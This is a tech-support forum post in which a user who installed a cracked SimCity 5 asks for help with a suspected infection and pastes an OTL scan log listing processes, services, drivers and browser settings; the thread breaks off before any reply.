Jump to content

Welcome to Geeks to Go - Register now for FREE

Need help with your computer or device? Want to learn new tech skills? You're in the right place!
Geeks to Go is a friendly community of tech experts who can solve any problem you have. Just create a free account and post your question. Our volunteers will reply quickly and guide you through the steps. Don't let tech troubles stop you. Join Geeks to Go now and get the support you need!

How it Works Create Account
Photo

I think my PC got infected by Razor1911 [Closed] [Solved]

razor1911 sim city 5 infection

  • This topic is locked This topic is locked

#1
langvu900

langvu900

    Member

  • Member
  • PipPip
  • 11 posts

Hello, i downloaded sim city 5 cracked by Razor1911, and i think my computer got infected (a page told me that my PC ID-address is spam). I read the instruction and here is my OTL.txt file. Please help and thank you!

 

OTL logfile created on: 09.08.2014 23:08:16 - Run 1

OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\PhanCo.FAMILIE-LE-NB\Downloads\Programs
64bit- Home Premium Edition  (Version = 6.1.7600) - Type = NTWorkstation
Internet Explorer (Version = 9.0.8112.16421)
Locale: 00000407 | Country: Deutschland | Language: DEU | Date Format: dd.MM.yyyy
 
3,68 Gb Total Physical Memory | 1,77 Gb Available Physical Memory | 48,16% Memory free
7,35 Gb Paging File | 4,87 Gb Available in Paging File | 66,21% Paging File free
Paging file location(s): c:\pagefile.sys 0 0 [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 685,54 Gb Total Space | 255,31 Gb Free Space | 37,24% Space Free | Partition Type: NTFS
 
Computer Name: FAMILIE-LE-NB | User Name: Papa | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Quick Scan | Include 64bit Scans
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - [2014.08.09 22:34:14 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\PhanCo.FAMILIE-LE-NB\Downloads\Programs\OTL.exe
PRC - [2014.08.06 16:34:34 | 013,246,272 | ---- | M] (TeamViewer GmbH) -- C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe
PRC - [2014.08.06 16:34:34 | 005,052,224 | ---- | M] (TeamViewer GmbH) -- C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
PRC - [2014.08.06 16:21:00 | 000,229,696 | ---- | M] (TeamViewer GmbH) -- C:\Program Files (x86)\TeamViewer\Version9\tv_w32.exe
PRC - [2014.07.18 18:44:10 | 003,890,208 | ---- | M] (AVAST Software) -- C:\Programme\Alwil Software\Avast5\avastui.exe
PRC - [2014.04.17 21:07:28 | 004,672,920 | ---- | M] (Akamai Technologies, Inc.) -- C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Akamai\netsession_win.exe
PRC - [2014.01.20 17:29:42 | 000,142,200 | ---- | M] (Itim Technologies Co., Ltd.) -- C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\CocCoc\Update\1.3.39.7\CocCocCrashHandler.exe
PRC - [2013.11.26 11:24:43 | 000,500,696 | ---- | M] (CyberLink Corp.) -- C:\Program Files (x86)\Cyberlink\YouCam6\YouCamService6.exe
PRC - [2013.11.22 15:58:40 | 002,033,016 | ---- | M] (NCT Corporation) -- C:\Program Files (x86)\NhacCuaTui\1.0.6.27\NhacCuaTui.exe
PRC - [2013.10.30 10:37:18 | 000,139,312 | ---- | M] (VNPT-CA) -- C:\Program Files (x86)\VNPT-CA\VNPT-CA CL Token Manager v1\vnpt-ca_cl_v1_certd.exe
PRC - [2013.09.27 03:19:28 | 005,474,816 | ---- | M] (i-Funbox.com) -- C:\Program Files (x86)\iFunbox 2013\iFunBox2013.exe
PRC - [2013.06.20 18:54:26 | 003,604,048 | ---- | M] (Tonec Inc.) -- C:\Program Files (x86)\Internet Download Manager\IDMan.exe
PRC - [2013.06.07 04:59:45 | 001,925,656 | ---- | M] (Aeria Games & Entertainment) -- C:\Program Files (x86)\Aeria Games\Ignite\aeriaignite.exe
PRC - [2012.12.12 20:44:48 | 000,268,248 | ---- | M] (Tonec Inc.) -- C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe
PRC - [2012.10.23 08:34:36 | 000,757,368 | ---- | M] (Samsung) -- C:\Programme\Samsung\AllShare Framework DMS\1.3.06\AllShareFrameworkDMS.exe
PRC - [2010.03.18 11:19:26 | 000,113,152 | ---- | M] (ArcSoft Inc.) -- C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe
PRC - [2010.03.04 10:16:06 | 000,013,336 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
PRC - [2010.03.04 10:16:04 | 000,284,696 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
PRC - [2009.01.05 05:39:43 | 000,050,344 | ---- | M] (AVAST Software) -- C:\Programme\Alwil Software\Avast5\AvastSvc.exe
 
 
========== Modules (No Company Name) ==========
 
MOD - [2014.04.23 16:05:12 | 000,073,544 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
MOD - [2014.04.23 16:04:54 | 001,044,808 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
MOD - [2014.04.23 16:04:54 | 000,237,384 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxslt.dll
MOD - [2013.09.05 00:14:10 | 004,300,456 | ---- | M] () -- C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\Cultures\office.odf
MOD - [2013.05.02 19:00:50 | 001,218,560 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\2024a7339aa5ad2712d239d454d3c355\System.Management.ni.dll
MOD - [2013.05.02 18:58:59 | 000,787,456 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.EnterpriseSe#\d340a103e8f063a3771cbeaaec58d157\System.EnterpriseServices.ni.dll
MOD - [2013.05.02 18:58:59 | 000,236,032 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.EnterpriseSe#\d340a103e8f063a3771cbeaaec58d157\System.EnterpriseServices.Wrapper.dll
MOD - [2013.05.02 18:58:58 | 000,649,728 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions\9253eb314ef2f5adada0d5fdf1d4a839\System.Transactions.ni.dll
MOD - [2013.05.02 18:58:56 | 002,647,040 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runtime.Seri#\48ee0e1de873152ec7e85d7456c1cc09\System.Runtime.Serialization.ni.dll
MOD - [2013.05.02 18:58:08 | 001,801,728 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml\cbb7db665b3ba25a931258eb702527f5\System.Xaml.ni.dll
MOD - [2013.05.02 18:53:50 | 000,771,584 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\01b47a246b4ec7bfec31bf4503aceda1\System.Runtime.Remoting.ni.dll
MOD - [2013.05.02 18:53:49 | 003,325,952 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\WindowsBase\82a4c4666ad83c3a375210247e69646b\WindowsBase.ni.dll
MOD - [2013.05.02 18:53:46 | 000,452,608 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\IAStorUtil\dd2d0cf72eac6e5b113a0059aeb3cab5\IAStorUtil.ni.dll
MOD - [2013.05.02 18:53:44 | 012,433,920 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\05682429807d34d6ff05a77ea153935f\System.Windows.Forms.ni.dll
MOD - [2013.05.02 18:53:37 | 001,592,832 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\e2ee5d77ebe0bd025e7a7a317a43d677\System.Drawing.ni.dll
MOD - [2013.05.02 18:53:13 | 005,453,312 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\10aba2c167cc1119b80159fd9ac71ca8\System.Xml.ni.dll
MOD - [2013.05.02 18:53:09 | 000,971,264 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\96a3b737db1e72adaf32d2b350e50c23\System.Configuration.ni.dll
MOD - [2013.05.02 18:53:08 | 007,974,400 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System\c54750e64ba10d0fb7b6a636fb3695ca\System.ni.dll
MOD - [2013.05.02 18:53:02 | 011,490,816 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\b0b8554c05f194f546a8ed531320760b\mscorlib.ni.dll
MOD - [2013.05.02 03:16:33 | 018,002,944 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationFramewo#\f28a346ae10e2eec581608f591cf7116\PresentationFramework.ni.dll
MOD - [2013.05.02 03:16:29 | 013,199,360 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\806c4ba7d696ab586ffd774a31f1a66b\System.Windows.Forms.ni.dll
MOD - [2013.05.02 03:16:21 | 006,815,232 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\8167f7d08668a5859e76aa9a1124a42f\System.Data.ni.dll
MOD - [2013.05.02 03:16:20 | 001,667,584 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\b83993cc955262507c8ead67567c8060\System.Drawing.ni.dll
MOD - [2013.05.02 03:16:18 | 000,595,968 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationFramewo#\7d6b122bee0977d953ee2409d74c3c25\PresentationFramework.Aero.ni.dll
MOD - [2013.05.02 03:14:42 | 011,451,904 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\8983c040161b34c64474f195bff5e2de\PresentationCore.ni.dll
MOD - [2013.05.02 03:14:31 | 003,858,944 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\5dbabea688adfc665e3453561736699a\WindowsBase.ni.dll
MOD - [2013.05.02 03:14:21 | 005,617,664 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\d884c684ee3f738a60e3c50dd5d88caa\System.Xml.ni.dll
MOD - [2013.05.02 03:14:18 | 000,982,528 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\cb72ac8478a5ea7e2d570bb710ecb1c1\System.Configuration.ni.dll
MOD - [2013.05.02 03:14:15 | 007,069,696 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\08bebcf66ad666dfdf2a4a934d79c0f9\System.Core.ni.dll
MOD - [2013.05.02 03:14:09 | 009,094,656 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System\df418085cedae9fa2efee87e20a419a4\System.ni.dll
MOD - [2013.05.02 03:14:03 | 014,413,824 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\60c214b6ad5691e368a16ec65d127c27\mscorlib.ni.dll
MOD - [2010.09.19 09:03:53 | 000,315,392 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_de_b77a5c561934e089\mscorlib.resources.dll
MOD - [2009.01.05 05:39:52 | 019,336,120 | ---- | M] () -- C:\Programme\Alwil Software\Avast5\libcef.dll
 
 
========== Services (SafeList) ==========
 
SRV:64bit: - File not found [Auto | Stopped] -- C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe -- (btwdins)
SRV:64bit: - [2010.04.21 06:34:40 | 000,202,752 | ---- | M] (AMD) [Auto | Running] -- C:\Windows\SysNative\atiesrxx.exe -- (AMD External Events Utility)
SRV - [2014.08.06 16:34:34 | 005,052,224 | ---- | M] (TeamViewer GmbH) [Auto | Running] -- C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe -- (TeamViewer9)
SRV - [2014.02.26 04:57:46 | 000,568,512 | ---- | M] (Valve Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe -- (Steam Client Service)
SRV - [2013.10.23 08:15:08 | 000,172,192 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Updater\Updater.exe -- (SkypeUpdate)
SRV - [2012.12.20 18:37:14 | 000,662,752 | ---- | M] (Copyright 2012 SAMSUNG) [Auto | Running] -- C:\Users\Papa\Documents\AllShare Play\AllShare Play Service.exe -- (AllShare Play Service)
SRV - [2012.10.23 09:15:52 | 000,408,184 | ---- | M] (Samsung) [Auto | Running] -- C:\Programme\Samsung\AllShare Framework DMS\1.3.06\AllShareFrameworkManagerDMS.exe -- (AllShare Framework DMS)
SRV - [2012.07.17 15:14:44 | 002,292,480 | ---- | M] (Microsoft Corp.) [Auto | Running] -- C:\Programme\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE -- (wlidsvc)
SRV - [2010.03.18 13:16:28 | 000,130,384 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)
SRV - [2010.03.18 11:19:26 | 000,113,152 | ---- | M] (ArcSoft Inc.) [Auto | Running] -- C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe -- (ACDaemon)
SRV - [2010.03.04 10:16:06 | 000,013,336 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe -- (IAStorDataMgrSvc)
SRV - [2010.01.10 03:34:24 | 004,925,184 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Programme\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE -- (osppsvc)
SRV - [2010.01.10 03:20:56 | 000,174,440 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Programme\Common Files\Microsoft Shared\Source Engine\OSE.EXE -- (ose64)
SRV - [2009.10.01 00:34:22 | 002,314,240 | ---- | M] (Intel Corporation) [Auto | Stopped] -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe -- (UNS)
SRV - [2009.06.11 04:23:09 | 000,066,384 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)
SRV - [2009.01.05 05:39:43 | 000,050,344 | ---- | M] (AVAST Software) [Auto | Running] -- C:\Programme\Alwil Software\Avast5\AvastSvc.exe -- (avast! Antivirus)
 
 
========== Driver Services (SafeList) ==========
 
DRV:64bit: - [2014.01.04 18:22:21 | 000,868,848 | ---- | M] (Duplex Secure Ltd.) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\sptd.sys -- (sptd)
DRV:64bit: - [2013.10.29 14:26:19 | 000,041,704 | ---- | M] (CyberLink Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\clwvd6.sys -- (clwvd6)
DRV:64bit: - [2013.05.25 22:00:14 | 000,168,288 | ---- | M] (Tonec Inc.) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\idmwfp.sys -- (IDMWFP)
DRV:64bit: - [2013.03.18 16:51:08 | 000,054,784 | ---- | M] (Apple, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\usbaapl64.sys -- (USBAAPL64)
DRV:64bit: - [2013.02.05 22:06:06 | 000,057,840 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\fssfltr.sys -- (fssfltr)
DRV:64bit: - [2013.01.20 16:12:40 | 000,314,016 | ---- | M] () [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\atksgt.sys -- (atksgt)
DRV:64bit: - [2013.01.20 16:12:40 | 000,043,680 | ---- | M] () [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\lirsgt.sys -- (lirsgt)
DRV:64bit: - [2012.08.21 13:01:20 | 000,033,240 | ---- | M] (GEAR Software Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\GEARAspiWDM.sys -- (GEARAspiWDM)
DRV:64bit: - [2012.03.01 13:54:38 | 000,022,896 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\Windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:64bit: - [2011.03.11 13:22:41 | 000,107,904 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:64bit: - [2011.03.11 13:22:40 | 000,027,008 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:64bit: - [2010.09.21 09:07:08 | 000,312,184 | ---- | M] () [Kernel | System | Running] -- C:\Windows\SysNative\drivers\ArcSec.sys -- (ArcSec)
DRV:64bit: - [2010.04.28 13:21:38 | 000,018,432 | ---- | M] (NTI Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\NTIDrvr.sys -- (NTIDrvr)
DRV:64bit: - [2010.04.28 13:21:38 | 000,017,408 | ---- | M] (NTI Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\UBHelper.sys -- (UBHelper)
DRV:64bit: - [2010.04.21 08:15:04 | 006,406,144 | ---- | M] (ATI Technologies Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\atipmdag.sys -- (amdkmdag)
DRV:64bit: - [2010.04.21 05:39:36 | 000,188,928 | ---- | M] (Advanced Micro Devices, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\atikmpag.sys -- (amdkmdap)
DRV:64bit: - [2010.04.21 05:08:04 | 010,322,848 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\igdpmd64.sys -- (intelkmd)
DRV:64bit: - [2010.04.08 03:12:02 | 000,124,944 | ---- | M] (ATI Technologies, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\AtiHdmi.sys -- (AtiHdmiService)
DRV:64bit: - [2010.04.07 09:04:22 | 002,216,960 | ---- | M] (Atheros Communications, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\athrx.sys -- (athr)
DRV:64bit: - [2010.04.01 15:18:30 | 003,060,800 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\BCMWL664.SYS -- (BCM43XX)
DRV:64bit: - [2010.03.05 17:04:08 | 000,335,400 | ---- | M] (Broadcom Corporation.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\btwampfl.sys -- (btwampfl)
DRV:64bit: - [2010.03.04 09:51:40 | 000,540,696 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStor.sys -- (iaStor)
DRV:64bit: - [2010.03.01 22:37:40 | 000,039,464 | ---- | M] (Broadcom Corporation.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\btwl2cap.sys -- (btwl2cap)
DRV:64bit: - [2010.02.22 22:41:42 | 000,121,344 | ---- | M] (ZTE Incorporated) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ZTEusbser6k.sys -- (ZTEusbser6k)
DRV:64bit: - [2010.02.22 22:41:42 | 000,121,344 | ---- | M] (ZTE Incorporated) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ZTEusbnmea.sys -- (ZTEusbnmea)
DRV:64bit: - [2010.02.22 22:41:42 | 000,121,344 | ---- | M] (ZTE Incorporated) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ZTEusbmdm6k.sys -- (ZTEusbmdm6k)
DRV:64bit: - [2010.02.15 03:05:12 | 000,102,440 | ---- | M] (Broadcom Corporation.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\btwaudio.sys -- (btwaudio)
DRV:64bit: - [2010.01.13 22:41:12 | 000,135,720 | ---- | M] (Broadcom Corporation.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\btwavdt.sys -- (btwavdt)
DRV:64bit: - [2010.01.13 22:41:06 | 000,021,544 | ---- | M] (Broadcom Corporation.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\btwrchid.sys -- (btwrchid)
DRV:64bit: - [2009.12.28 20:52:12 | 000,012,800 | ---- | M] (ZTE Incorporated) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\massfilter.sys -- (massfilter)
DRV:64bit: - [2009.12.22 08:18:48 | 000,074,280 | ---- | M] (Atheros Communications, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\L1C62x64.sys -- (L1C)
DRV:64bit: - [2009.10.26 11:39:44 | 000,151,936 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Impcd.sys -- (Impcd)
DRV:64bit: - [2009.10.05 10:08:44 | 000,087,600 | ---- | M] (Citrix Systems, Inc.) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\ctxusbm.sys -- (ctxusbm)
DRV:64bit: - [2009.09.17 19:12:06 | 000,292,912 | ---- | M] (Synaptics Incorporated) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\SynTP.sys -- (SynTP)
DRV:64bit: - [2009.09.17 17:54:54 | 000,056,344 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\HECIx64.sys -- (HECIx64)
DRV:64bit: - [2009.07.14 08:52:20 | 000,194,128 | ---- | M] (AMD Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:64bit: - [2009.07.14 08:48:04 | 000,065,600 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:64bit: - [2009.07.14 08:47:48 | 000,077,888 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:64bit: - [2009.07.14 08:45:55 | 000,024,656 | ---- | M] (Promise Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:64bit: - [2009.07.14 07:35:32 | 000,012,288 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\serscan.sys -- (StillCam)
DRV:64bit: - [2009.06.17 23:54:46 | 000,040,976 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\LUsbFilt.sys -- (LUsbFilt)
DRV:64bit: - [2009.06.17 23:54:30 | 000,057,872 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\LMouFilt.Sys -- (LMouFilt)
DRV:64bit: - [2009.06.17 23:54:22 | 000,055,312 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\LHidFilt.Sys -- (LHidFilt)
DRV:64bit: - [2009.06.11 03:34:33 | 003,286,016 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:64bit: - [2009.06.11 03:34:28 | 000,468,480 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:64bit: - [2009.06.11 03:34:23 | 000,270,848 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (b57nd60a)
DRV:64bit: - [2009.06.11 03:31:59 | 000,031,232 | ---- | M] (Hauppauge Computer Works, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hcw85cir.sys -- (hcw85cir)
DRV:64bit: - [2009.06.03 09:15:30 | 000,060,464 | ---- | M] (Egis Technology Inc.) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\mwlPSDVDisk.sys -- (mwlPSDVDisk)
DRV:64bit: - [2009.06.03 09:15:30 | 000,022,576 | ---- | M] (Egis Technology Inc.) [File_System | System | Running] -- C:\Windows\SysNative\drivers\mwlPSDFilter.sys -- (mwlPSDFilter)
DRV:64bit: - [2009.06.03 09:15:30 | 000,020,016 | ---- | M] (Egis Technology Inc.) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\mwlPSDNserv.sys -- (mwlPSDNServ)
DRV:64bit: - [2009.05.26 20:32:38 | 000,040,448 | ---- | M] (Alcor Micro, Corp.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\AmUStor.sys -- (AmUStor)
DRV:64bit: - [2009.04.09 19:38:26 | 000,167,424 | ---- | M] (ZTE Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ZTEusbnet.sys -- (ZTEusbnet)
DRV:64bit: - [2009.04.09 19:38:26 | 000,150,784 | ---- | M] (ZTE Incorporated) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\zteusbvoice.sys -- (ZTEusbvoice)
DRV:64bit: - [2009.02.03 22:00:04 | 000,012,800 | ---- | M] (ZTE Incorporated) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\massfilter_hs.sys -- (massfilter_hs)
DRV:64bit: - [2009.01.12 00:07:54 | 001,039,096 | ---- | M] (AVAST Software) [File_System | System | Running] -- C:\Windows\SysNative\drivers\aswsnx.sys -- (aswSnx)
DRV:64bit: - [2009.01.12 00:07:54 | 000,423,240 | ---- | M] (AVAST Software) [File_System | System | Running] -- C:\Windows\SysNative\drivers\aswsp.sys -- (aswSP)
DRV:64bit: - [2009.01.12 00:07:54 | 000,085,328 | ---- | M] (AVAST Software) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\aswstm.sys -- (aswStm)
DRV:64bit: - [2009.01.05 05:39:58 | 000,208,416 | ---- | M] () [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\aswVmm.sys -- (aswVmm)
DRV:64bit: - [2009.01.05 05:39:58 | 000,065,776 | ---- | M] () [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\aswRvrt.sys -- (aswRvrt)
DRV:64bit: - [2009.01.05 05:39:57 | 000,093,568 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\aswRdr2.sys -- (aswRdr)
DRV:64bit: - [2009.01.05 05:39:57 | 000,079,184 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\Windows\SysNative\drivers\aswMonFlt.sys -- (aswMonFlt)
DRV:64bit: - [2009.01.05 05:39:57 | 000,029,208 | ---- | M] () [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\aswHwid.sys -- (aswHwid)
DRV - [2013.11.27 06:00:30 | 000,086,352 | ---- | M] () [Kernel | On_Demand | Stopped] -- C:\AeriaGames\AuraKingdom\avital\hxsy64.sys -- (hxsyol)
DRV - [2010.01.29 11:40:16 | 000,115,600 | ---- | M] (EZB Systems, Inc.) [File_System | System | Running] -- C:\Program Files (x86)\UltraISO\drivers\ISODrv64.sys -- (ISODrive)
DRV - [2009.07.14 08:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount)
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://homepage.acer...03z115t77m1j59s
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://start.mysearc...=1727878116&ir=
IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {6A1806CD-94D4-4689-BA73-E35EA1EA9990}
IE:64bit: - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC
IE:64bit: - HKLM\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.co...g}&sourceid=ie7
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://homepage.acer...03z115t77m1j59s
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://start.mysearc...=1727878116&ir=
IE - HKLM\..\SearchScopes,DefaultScope = {6A1806CD-94D4-4689-BA73-E35EA1EA9990}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC
IE - HKLM\..\SearchScopes\{67A2568C-7A0A-4EED-AECC-B5405DE63B64}: "URL" = http://www.google.co...ng}&rlz=1I7ACAW
IE - HKLM\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.co...g}&sourceid=ie7
IE - HKLM\..\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}: "URL" = http://websearch.wis...&cc=VN&unqvl=39
